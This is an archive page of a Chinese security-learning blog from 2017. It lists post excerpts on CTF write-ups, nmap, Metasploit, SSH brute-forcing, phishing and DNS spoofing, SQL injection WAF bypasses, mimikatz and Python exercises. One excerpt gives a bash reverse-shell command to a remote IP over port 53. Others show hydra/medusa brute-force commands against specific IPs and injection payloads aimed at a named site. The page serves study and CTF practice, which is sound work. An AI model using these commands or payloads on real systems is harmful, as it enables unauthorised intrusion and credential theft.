亚马逊云储存器S3 BCUKET安全性学习笔记
摘要:亚马逊云储存器S3 BCUKET安全性学习笔记 Bugs_Bunny CTF – Walk walk CTF 昨天玩了会这个比赛,碰到这题是知识盲点,来记录一下。 先从题目看起吧。 http://www.chouaibhm.me/ 浏览页面,发现这个错误页面。 看这个错误页面,如果有经验的话,会发现
阅读全文
posted @ 2017-07-31 14:05
07 2017 档案
(web)Bugs_Bunny_CTF_writeup 部分简单web
摘要:QnVnc19CdW5ueXs1MjljNDI5YWJkZTIxNzFkMGEyNTU4NDQ3MmFmODIxN30K Bugs_Bunny{529c429abde2171d0a25584472af8217} 2. Encryption 修改agent,得到两个hash, zn8XhqnlBRBe
阅读全文
posted @ 2017-07-31 00:58
给windows右键添加快捷启动程序
摘要:给windows右键添加快捷启动程序 修改点击空白处的右键 1. 运行——redegit 2. 打开注册表 3. 展开第一个H..C..R 4. 找到 Direcory,展开 5. 找到Background 展开 6. 右键shell,新建项,名字为powershell 7. 右键powershel
阅读全文
posted @ 2017-07-29 22:27
nmap学习笔记
摘要:nmap学习笔记 基本操作 nmap 192.168.242.1 (检测端口开放情况) 1 10000 nmap 192.168.242.1 192.168.242.2 (检测两个目标) vv参数可以对结果详细输出 常用命令 nmap p 80,3389,22,21,8080,3306 202.19
阅读全文
posted @ 2017-07-29 21:14
暴力美学
摘要:SSH可以使用hydra和medusa hydra 示例: hydra l root P passwd.txt t 4 v 202.195.144.101 ssh medusa 示例: medusa u root p passwd.txt h 192.168.242.132 M ssh 3389 h
阅读全文
posted @ 2017-07-28 23:26
Metasploit学习笔记
摘要:Metasploit学习笔记 0x0 ms08_067漏洞复现 1. search ms08_067 2. use exploit/windows/smb/ms08_067_netapi 3. show payloads 4. set payload generic/shell_reverse_tc
阅读全文
posted @ 2017-07-28 23:20
钓鱼+DNS欺骗学习笔记
摘要:钓鱼+DNS欺骗学习笔记 0x00 写在前面 原文链接: http://www.cnblogs.com/hkleak/p/5186523.html 感谢大佬无私教学 0x01 步骤如下 第一步:布置钓鱼页面 提示:weenman在windows无法配置运行 1. git clone https://
阅读全文
posted @ 2017-07-28 23:19
解决HTML中文乱码问题
摘要:将HTML代码复制到一个新建的记事本 然后在记事本里面的操作 另存为 选择utf-8编码 新的那个html文本打开 中文已显示正常
阅读全文
posted @ 2017-07-28 23:07
MySQL SQL Injection Cheat Sheet
摘要:MySQL SQL Injection Cheat Sheet Some useful syntax reminders for SQL Injection into MySQL databases… This post is part of a series of SQL Injection Ch
阅读全文
posted @ 2017-07-28 00:11
Reverse Shell Cheat Sheet
摘要:``` Reverse Shell Cheat Sheet If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s n...
阅读全文
posted @ 2017-07-28 00:10
Linux下反弹shell笔记
摘要:Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点。 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp \ v 参数,详细输出 n参数高数net
阅读全文
posted @ 2017-07-26 01:11
[转载]nc命令详解
摘要:``` 最近在搞反向连接,试来试去发现最好的工具还是nc。正好趁这个机会把nc的用法总结一下: 1.端口扫描: nc vv ip port 例:nc vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口 nc vv w secs ip port port 例:nc
阅读全文
posted @ 2017-07-26 00:01
[转载]从phpinfo中能获取哪些敏感信息
摘要:```
phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个 phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从 phpinfo()中获得哪些敏感信息呢?php 版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。 一、绝对路径(_SERVER[“SCRIPT_FILENAME”])
这个是最常用,也是最有效的一...
阅读全文
posted @ 2017-07-24 16:48
[转载]SQL注入绕过WAF的方法总结
摘要:```
基本/简单绕过方法: 1、注释符
http://www.0dayhack.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4…. 2、使用大小写
http://www.0dayhack.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4…. 3、结合前面两种方法
http://ww...
阅读全文
posted @ 2017-07-24 16:39
session 会话机制以及变量覆盖
摘要:session会话机制介绍如下 http是无状态协议。服务器靠cookie和session来记住用户。$_SESSION 和 $_GET等一样,是超全局变量。 后台脚本里面会写: session() start 。会话开始。所以,当浏览器访问一个页面时,session机制就开始了。这个时候机制会生成
阅读全文
posted @ 2017-07-24 10:56
PHP学习笔记
摘要:php学习笔记 引用赋值 8种类型 1. 整型 2. 布尔型 3. 浮点型 4. 字符串 5. 数组 6. 对象 7. 资源类型 8. 空类型 var_dump()输出变量的值和类型 整型变量声明: 以0开头表示以八进制声明一个变量,以0x开头表示以十六进制声明一个变量。整数的最大值 4字节,2的3
阅读全文
posted @ 2017-07-24 10:55
53端口反弹shell
摘要:shell反弹 由于防火墙策略,导致并不能按预期的反弹shell,端口被封禁,可以使用53端口进行反弹shell 命令如下: bash c 'sh i & /dev/tcp/210.28.30.887/53 0 &1' nc监听本地53端口即可
阅读全文
posted @ 2017-07-24 10:09
linux鸟哥学习笔记
摘要:Linux学习笔记 Linux档案权限和目录配置 目录如果没有x权限,则无法进入该目录 改变文件和属性 chgrp: 改变档案所属的群组 chown:改变档案的拥有者 chmod:改变档案的权限,SUID,SGID,SBIT等等 权限分数对照: r:4 w:2 x:1 那么 rwxrwx 对应的分数
阅读全文
posted @ 2017-07-22 22:47
WIRESHARK 提取百度云客户端中的下载地址
摘要:序言:近两年感觉云盘是越来越不行了,什么115,360,华为,新浪一些网盘纷纷关门,现在手里能用的就只剩下一个百度云坚挺着。可那速度,简直感人,好吧,没钱冲VIP,就去找了一个破解版,用了一年,爽得飞起,满速度下载,可是近两个月,速度实在是感人,200K/S?下一个电影两个小时,逗我呢?我就想能不能
阅读全文
posted @ 2017-07-22 11:03
阴阳师辅助(基于按键精灵)
摘要:其实这篇文章好早就像写了,可是我这种拖延症晚期的人啊,做什么事都是拖拖拉拉的,最近玩火号被封了,才想起这件事…好了好了,废话不说了。 首先是按键精灵,经常玩游戏的人可能会认识,一个神奇的脚本软件,可以说是完全基于图形化的,稍微有一点编程基础,就能轻松驾驭。 《阴阳师》这一款手游,可以说是一个卡牌游戏
阅读全文
posted @ 2017-07-22 11:02
随便写写爬虫
摘要:0x00 前言(哦 上面有一首歌 =- =) 想起来,好久都没看漫画了,哎,都养得够肥了,自从高考之后,好像除了神精榜看完了之外,就再也没看过其他漫画,《斗罗大陆》《斗破苍穹》之类,啊,好多都没看。突然想看了,就去网上找了一下。我的天,什么网站,这么多广告,哎,也是,人家凭什么免费给你看,广告在所难
阅读全文
posted @ 2017-07-22 10:59
python 命令行参数学习(二)
摘要:照着例子看看打打,码了就会。写了个命令行参数调用进行运算的脚本。 参考文章链接:http://www.jianshu.com/p/a50aead61319 感觉差不多了,自己会用了
阅读全文
posted @ 2017-07-22 10:49
python 命令行参数学习(一)
摘要:用了这么久,还没怎么学习python的命令行参数,是在惭愧。 参考文章地址:http://www.cnblogs.com/jianboqi/archive/2013/01/10/2854726.html 自己的代码实例:
阅读全文
posted @ 2017-07-22 09:55
无题吧
摘要:总想写点东西,不知道取什么标题好,就叫无题吧。 估计以后写的会和这重名很多。 我知道,我现在这种感觉是一种失落,大概和传说中的失恋查差不多,可我又并没有真正失恋过,所以说,只能说是传说中。 其实我已经和你说了一切,可你似乎并未察觉,也许是心境不一样,也许,也许,一切的一切,都是我想多了,谁在意呢。
阅读全文
posted @ 2017-07-21 21:29
解决centos7服务器shadows已启动但是无法连接的问题
摘要:这是由于centos7防火墙并没有开放ss端口的问题 添加json文件中的自己的端口即可
阅读全文
posted @ 2017-07-20 11:20
“exec: "ssh-keygen": executable file not found in %PATH%” 问题解决
摘要:将以上内容保存为start.bat,放在boot2docker根目录下,管理员身份运行即可
阅读全文
posted @ 2017-07-19 22:22
python练习册 每天一个小程序 第0013题
摘要:# -*-coding:utf-8-*— ''' 题目描述: 用 Python 写一个爬图片的程序,爬 这个链接里的日本妹子图片 :-) 地址: http://tieba.baidu.com/p/2166231880 思路: 用正则表达式匹配图片链接,然后进行下载 ''' ''' import re import re...
阅读全文
posted @ 2017-07-19 12:16
python练习册 每天一个小程序 第0012题
摘要:# -*-coding:utf-8-*- def test(content): text = content flag = 0 with open('filtered_words.txt') as fp: for line in fp.readlines(): text = text.replace(line.strip('\n...
阅读全文
posted @ 2017-07-18 15:11
python练习册 每天一个小程序 第0011题
摘要:1 # -*-coding:utf-8-*- 2 3 4 def test(content): 5 flag = 0 6 with open('filtered_words.txt') as fp: 7 for line in fp.readlines(): 8 if line.strip('\n') in conten...
阅读全文
posted @ 2017-07-17 11:13
[XMAN筛选赛](web)ctf用户登录
摘要:0x00 题目概述 就只写了几道web题,有些考察点比较明显,所以个人感觉来说web总体不难。 一航的writeup写得差不多,我这写个他没写的wirteup。 看题: 链接点进去是一个登录页面,习惯性使用admin,admin居然登录成功了。 进去之后什么都没有。 尝试在登录的用户名进行注入,发现
阅读全文
posted @ 2017-07-17 10:43
python练习册 每天一个小程序 第0010题
摘要:# -*-coding:utf-8-*- ''' 题目描述: 使用 Python 生成类似于下图中的字母验证码图片 思路: 运用PIL库加random 随机字母进行生成 ''' import random import string from PIL import Image, ImageDraw, ImageFont, ImageFilter def rnword(): ...
阅读全文
posted @ 2017-07-16 20:34
request的自动urlencode问题解决
摘要:今天写盲注脚本的时候,由于题目对空格进行了过滤,所以必须要用%09进行代替,然而当我在脚本中,将payload的空格替换成%09的时候,抓包发现进行了两次编码,导致脚本一直跑不通。 自己在网上也没有找到可以关闭request 这个url编码的问题的答案。 想到了可以先decode试一下。 所以,问题
阅读全文
posted @ 2017-07-16 20:11
解决盲注编码问题
摘要:Traceback (most recent call last): File "E:/Pycharm Project/CTF/xman-ctf��¼.py", line 56, in <module> if accesss(urllib.unquote(sub_tables(i, w))): Fi
阅读全文
posted @ 2017-07-16 20:05
python练习册 每天一个小程序 第0009题
摘要:1 ''' 2 题目描述: 3 找出一个html文件中所有的url 4 5 思路 : 6 利用正则表达式进行匹配 7 8 ''' 9 10 11 import re 12 13 14 with open('test.txt') as fp: 15 text = fp.read() 16 pattern = re.compile( 17 ...
阅读全文
posted @ 2017-07-15 20:08
sublime settings
摘要:monaco,先从网上下载ttf格式,然后放到windows目录下的font目录 配置python开发环境: pylinter 插件: 对违反规范提示图标 SublimeCodeIntel 插件: 可以自定义提示的内容库,我的python智能提示设置 Python PEP8 Autoformat 插
阅读全文
posted @ 2017-07-15 15:52
论php常见的问题[转载自原乌云]
摘要:论PHP常见的漏洞 ′ 雨。 · 2015/01/14 10:08 0x00 前言 里面很多都是像laterain学习到的, 如果能考上cuit的话 自动献菊花了。 0x01 安装的问题 首先拿到一份源码 肯定是先install上。 而在安装文件上又会经常出现问题。 一般的安装文件在安装完成后 基本
阅读全文
posted @ 2017-07-14 17:07
python练习册 每天一个小程序 第0008题
摘要:1 # -*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目描述: 5 一个HTML文件,找出里面的正文。 6 7 思路: 8 利用BeautifulSoup或者正则表达式 9 10 ''' 11 ''' 12 import requests 13 from bs4 import BeautifulSoup...
阅读全文
posted @ 2017-07-14 16:30
bat加mimikatz一键获取密码
摘要:将上面内容保存为.bat,和mimikatz放在一起
阅读全文
posted @ 2017-07-13 13:33
python练习册 每天一个小程序 第0007题
摘要:1 # -*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目描述: 5 有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来。 6 7 根据注释和正常语句的区别,进行筛选计数 8 ''' 9 10 import os 11 12 13 # 首先还是获取该目录下所有文...
阅读全文
posted @ 2017-07-13 10:30
python练习册 每天一个小程序 第0006题
摘要:这个感觉有点麻烦,应该需要一个词频统计,然后是过滤,再选择出现次数最多的关键词
阅读全文
posted @ 2017-07-12 15:54
python练习册 每天一个小程序 第0005题
摘要:1 # -*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目说明: 你有一个目录,装了很多照片,把它们的尺寸变成都不大于 iPhone5 分辨率的大小。 5 6 思路: 先获取该目录下所有图片的绝对路径,再一个一个打开,resiz改变大小保存 7 ''' 8 9 from PIL import Image 10 import...
阅读全文
posted @ 2017-07-11 10:42
[happyctf]部分writeup
摘要:题目名称:sqltest所属:MISC考察点:盲注 眼力 耐心(好吧是废话) 附件下载下来 ,到手一个流量包,用wireshark打开,大致浏览了一下,抓的应该是盲注的数据流量。 这里有一个经验问题,一般的数据流量包,这样的杂项题,二话不说,直接导出,选择导出http对象,save all。 导出后
阅读全文
posted @ 2017-07-10 22:26
python练习册 每天一个小程序 第0004题
摘要:1 #-*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目描述:任一个英文的纯文本文件,统计其中的单词出现的个数。 5 参考学习链接: 6 re http://www.cnblogs.com/tina-python/p/5508402.html#undefined 7 collections http://b...
阅读全文
posted @ 2017-07-10 22:12
[实验吧](web)因缺思厅的绕过 源码审计绕过
摘要:0x00 直接看源码吧 早上写了个注入fuzz的脚本,无聊回到实验吧的题目进行测试,发现了这道题 地址:http://ctf5.shiyanbar.com/web/pcat/index.php 分析如下: 1. 看过滤,过滤了一些查询关键词,明注是不可能了,过滤括号,通常的盲注也是实现不了。 2.
阅读全文
posted @ 2017-07-08 10:43
python练习册 每天一个小程序 第0002题
摘要:1 #-*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目描述: 5 将 0001 题生成的 200 个激活码(或者优惠券)保存到 MySQL 关系型数据库中。 6 ''' 7 """ 8 import MySQLdb as mdb 9 10 config = { 11 'host': '127.0.0.1...
阅读全文
posted @ 2017-07-08 08:33
python练习册 每天一个小程序 第0001题
摘要:1 # -*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目描述: 5 做为 Apple Store App 独立开发者,你要搞限时促销,为你的应用生成激活码(或者优惠券),使用 Python 如何生成 200 个激活码(或者优惠券)? 6 ''' 7 ''' 8 import random 9 10 ...
阅读全文
posted @ 2017-07-07 09:17
最近的时候
摘要:我想昨天是远日点 是太阳离地球最远的日子 你说应该见上一面可是都已经是昨天了到了明天就会变成前天大前天大大前天上个礼拜上个月去年最后是某年的某一天我总是如此愚蠢浑然不知此身此刻此时此地会变成我无限缅怀的过去如你对我说“Everything ends …and it's always sad.But
阅读全文
posted @ 2017-07-06 17:16
python练习册 每天一个小程序 第0000题
摘要:PIL库学习链接:http://blog.csdn.net/column/details/pythonpil.html?&page=1 1 #-*-coding:utf-8-*- 2 __author__ = 'Deen' 3 ''' 4 题目说明: 5 将你的 QQ 头像(或者微博头像)右上角加上红色的数字,类似于微信未读信息数量那种提示效果。 类似于图中效果 6 '''...
阅读全文
posted @ 2017-07-06 17:11
Django1.11 添加markdown语法支持
摘要:对post进行处理, models.py 详情如下 测试,效果如图
阅读全文
posted @ 2017-07-05 09:22
浙公网安备 33010602011771号